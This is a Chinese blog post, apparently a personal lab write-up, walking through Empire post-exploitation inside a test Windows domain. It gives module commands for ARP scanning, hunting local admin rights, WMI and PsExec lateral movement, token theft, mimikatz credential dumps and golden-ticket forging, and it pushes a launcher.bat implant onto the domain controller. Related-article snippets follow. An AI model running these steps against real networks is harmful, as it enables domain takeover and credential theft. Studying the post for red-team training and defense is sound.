Empire(三)域内渗透

最新推荐文章于 2024-04-09 09:35:04 发布
最新推荐文章于 2024-04-09 09:35:04 发布
阅读量267 收藏
点赞数 1
分类专栏: 安全工具 empire学习 安全 文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_56426046/article/details/126827105
版权
安全 同时被 3 个专栏收录
98 篇文章 13 订阅
订阅专栏
安全工具
35 篇文章 4 订阅
订阅专栏
empire学习
5 篇文章 1 订阅
订阅专栏

1.环境

计算机名

IP

dc

192.168.1.107

demo1

192.168.1.108

demo2

192.168.1.104

 2.模块使用

知识点:

域内网络访问internet需要加入信任站点不然访问不了。

!!!

如果域内用户访问不了外部网站,我们需要登录管理员账户对浏览器属性安全进行设置,设置可信任的站点并应用,这样用户的浏览器才能访问信任的网站。

参考以前的文章,打开监听器然后打开木马模块让域内主机点击木马。

Empire(一)基础使用_夜yesir的博客-CSDN博客

植入后门成功

重命名第一台主机为d:

rename  原名 d

然后用基本的命令查询本地的信息

sysinfo

whoami

info

arp扫描

situational_awareness/network/arpscan

查找本地管理员 

situational_awareness/network/powerview/find_localadmin_access

d1这个用户是否是域内某一台主机的本地管理员

 确定是否能访问 demo2的c盘这里demo2的名字是12-demo2,而且只有开启网络文件共享才能访问到。

查找域控

situational_awareness/network/powerview/get_domain_controller

这里注意切换到普通用户去使用查看域控的模块

会话注入

lateral_movement/invoke_wmi

lateral_movement/invoke_psexec 

通过invoke_wmi 或者 psexe模块 拿到12-demo2的权限

lateral_movement/invoke_wmi

设置好监听器和计算机名用execute执行

注意:只要有管理员权限的主机用模块才能获取另一台主机权限成功也就是agent的主机是administrator,我这里用的是dadmin

invoke_wmi 系统自带

psexec 留下记录

lateral_movement/invoke_psexec获取系统权限

 

命令token窃取

窃取之后就有dc的访问权限

ps 查询进程是否有域内超级管理员

窃取管理员权限进程号。

steal_token 进程号

 

 shell dir \\dc\C$

恢复原来身份可以用

revtoself

凭证获取

mimikatz

当前的权限为1 我们就可以用mimikatz 这个命令 获取明文 还有用户的一些凭证。

 我们获取之后可以用一个creds命令 查询用户凭证信息

获取域控权限

use lateral_movement/invoke_wmi

填写好Listener CredidComputerName

上述方式我失败了,我换了一种方式获取域控权限

先打开kali 的http服务通过命令行控制demo2下载木马,

再通过demo2上传到d1

 copy "C:\Windows\system32\launcher.bat" "\\12-dc\C$"

 切换到对应目录执行木马获取dc权限

cd \\12-dc\C$

start launcher.bat

后来发现其实我们在那个目录直接切换到dcC盘下就可以进行很多操作了

 制作黄金钥匙

creads

credentials/mimikatz/lsadump

krtbtgt 哈希

credentials/mimikatz/golden_ticket

set credid 4

set user Administrator

execute

 今天搞这个搞了一天,但是也同样学到了许多东西。还是希望自己日进一步吧。

从此以后,你守着太平,我守着你……那便不需要酒,彼此也早就醉了……想这世上还能有谁如我一般,三生有幸,所爱得你。———————————————————————夜叉一族,当为此世而战,金鹏大将,入阵!

—————————————————————————————————————————————————————生而贫穷并无过错,死而贫穷才是遗憾。

夜yesec
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
网络渗透测试基础之帝国empire
m0_65369792的博客
05-19 298
一. ​Empire介绍 Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 二.
渗透神器Empire安装和简单使用
hl1293348082的专栏
04-09 1948
1. Empire简介 官网介绍如下: Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable
在Empire实战渗透
weixin_34150224的博客
09-19 156
本文讲的是在Empire实战渗透, 0x01 写在开始 上一篇文章只是单纯的介绍了一些Empire的基本用法,但这么强大的工具根本不是一篇文章可以说清楚的,就像Metasploit,如果我单纯写一篇文章给你,告诉你这就是Metasploit全部的用法了。但是,真正的实战中,绝对是一脸蒙蔽的往着眼前的显示器,我要用什么命令?我接下来要用什么模块?类似这...
Empire渗透神器
weixin_43749601的博客
03-23 767
安装 git命令下载 git clone https://github.com/EmpireProject/Empire.git 接着进入setup目录,安装Empire cd Empire cd setup sudo ./install.sh 但是会出现报错 Traceback (most recent call last): File "./empire", line 13, in <module> from lib.common import empire, helpers
Empire内网渗透工具简单使用
yangbz123的博客
04-24 2033
文章目录工具介绍下载地址功能介绍设置监听生成木马后门1、Windows launcher_bat批处理脚本木马2、Windows dll动态链接文件木马3、Windows launcher_vbs 脚本木马4、Windows powershell payload脚本上线5、Windows macro(office宏)木马6、linux bash payload脚本上线Agent上线Interact 切换agents常用参数参考文献 工具介绍 Empire是一款强大的Powershell脚本利用框架,类似于M
empire框架2022最新版本
06-28
Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。 Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在...
Empire学习笔记.pdf
09-25
Empire是一款强大的、开源的 PowerShell 后渗透测试框架,由 Python 编写,主要用于网络攻防演练、红蓝对抗等安全场景。它允许安全研究人员在Windows、Linux和Mac OS平台上创建自定义的 PowerShell 模块,进行隐蔽的...
Empire知识点梳理
09-25
- **列出内所有的共享**:`usemodule situational_awareness/network/powerview/share_finder` - **提权(Privilege Escalation)** - **绕过UAC**:`usemodule privesc/bypassuac` 或 `usemodule powershell/...
empire-web:PowerShell Empire Web界面
05-14
运行Empire REST API服务器获取PowerShell Empire: : ./empire --rest --restport <port> --username <empire> --password <empire> 例如: ./empire --rest --restport 1337 --username admin --password 3mpir3...
由浅入深的渗透系列一(下)1
08-03
【由浅入深的渗透系列一(下)1】这篇文章主要讲述了在网络安全领中的渗透技术,涉及多个工具和方法。以下是对其中关键知识点的详细说明: 1. **Empire(ew)穿透**:Empire是一个现代的、动态的、Python编写...
探秘Empire:一个灵活的Powershell渗透测试框架
gitblog_00007的博客
04-09 309
探秘Empire:一个灵活的Powershell渗透测试框架 项目地址:https://gitcode.com/PowerShellEmpire/Empire Empire 是一款强大的开源Powershell渗透测试工具,旨在为红队操作和安全研究提供一个功能全面、模块化的平台。在本文中,我们将深入探讨Empire的原理、应用及其独特之处,帮助你更好地理解和利用这一工具。 项目简介 Empire是...
初探渗透神器Empire
weixin_33875564的博客
09-19 265
本文讲的是初探渗透神器Empire, 0x01奇怪的开始 我趁手机不注意,把它自由落体了,好在屏幕没裂开,只不过是断触了,要不对于已经穷疯了的我无疑又是一笔经济负担。好在手机还在保修期内,可以送过去修,但是我去的时间点不对。售后说要下班了,手机要明天才能修,我也没多说什么,手机留下就回来了。晚上,蹲厕所,叼着烟对着手纸发呆,心想:“我擦,我484傻,...
我的内网渗透-Empire基本操作
h1825819493的博客
06-18 119
Empire是一个纯粹的PowerShell开发后代理,基于加密安全的通信和灵活的体系结构构建。Empire实现了运行PowerShell代理的功能,而无需powershell.exe,从关键记录器到Mimikatz的可快速部署的利用后模块,以及适应性强的通信以逃避网络检测,所有这些都封装在以可用性为重点的框架中。它于2015年在BSidesLV上首次亮相。
Red Team之Empire渗透工具介绍和使用
afei001
04-26 974
Empire介绍     Empire是一个纯粹的PowerShell后开发代理建立在密码安全的通信和灵活的架构。使用灵活架构的附加组件进行加密安全通信。Empire可以在不需要PowerShell.exe的情况下执行PowerShell代理。它可以迅速地使用后利用的模块,这些模块涵盖了从键盘记录程序到mimikatz等各种各样的功能,以及适应性通信以逃避网络检测,所有这些都包含在以可用性为中心...
渗透测试神器Empire的详解
热门推荐
Fly_鹏程万里
06-04 1万+
1. Empire简介官网介绍如下:Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents...
14、渗透神器Empire安装和简单使用
Fly_鹏程万里
06-14 6655
1. Empire简介Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents withou...
全!Empire的基本使用和渗透
Appleteachers的博客
05-06 1275
一、Empire简介 ​ Empire是一款针对Windows平台的、使用Powershell脚本作为攻击载荷的渗透攻击框架工具,具有从stager生成、提权到渗透维持的一系列功能。Empire实现了无需powshell.exe就可运行Powershell代理的功能,还可以快速在后期部署漏洞利用模块,其内置模块有键盘记录、Mimikatz、绕过UAC、内网扫描等,使用能够躲避内网检测喝大部分安全防护工具的查杀,简单来说就有点类似Metasploit,是一个基于PowerShell的远程控制木马。 ​ Emp
PowerShell渗透--Empire(
weixin_41082546的博客
10-25 256
PowerShell渗透--Empire() 会话注入 我们可以使用usemodule management/psinject模块来进程注入,获取权限 设置下Listeners和ProcID这2个参数,这里的ProcID就是之前的CMD的pid,反弹回用户权限shell usemodule management/psinject set Listener Micr067 set...
Powershell Empire的使用
她叫常玉莹
07-04 4059
EmpireEmpire简介使用方法设置监听生成木马DLL木马launcherlauncher_vbs木马launcher_bat 木马Macro木马Ducky连接主机信息收集屏幕截图键盘记录剪贴板记录查找共享收集目标主机信息ARP扫描DNS信息获取查找管登陆服务器IP本地管理组访问模块提权Bypass UACbypassuac_wscriptPowerUpAllChecks模块GPP横向渗透会话注入Invoke-PsExecInvoke-WMIPowerShell Remoting后门权限持久性劫持sh
渗透框架控制软件
最新发布
04-29
渗透框架控制软件是指Metasploit、Cobalt Strike和Empire。它们都是用于网络渗透测试和攻击模拟的工具,具有强大的功能和灵活性。 1. Metasploit:Metasploit是一个开源的渗透测试框架,由Rapid7开发和维护。它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

夜yesec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值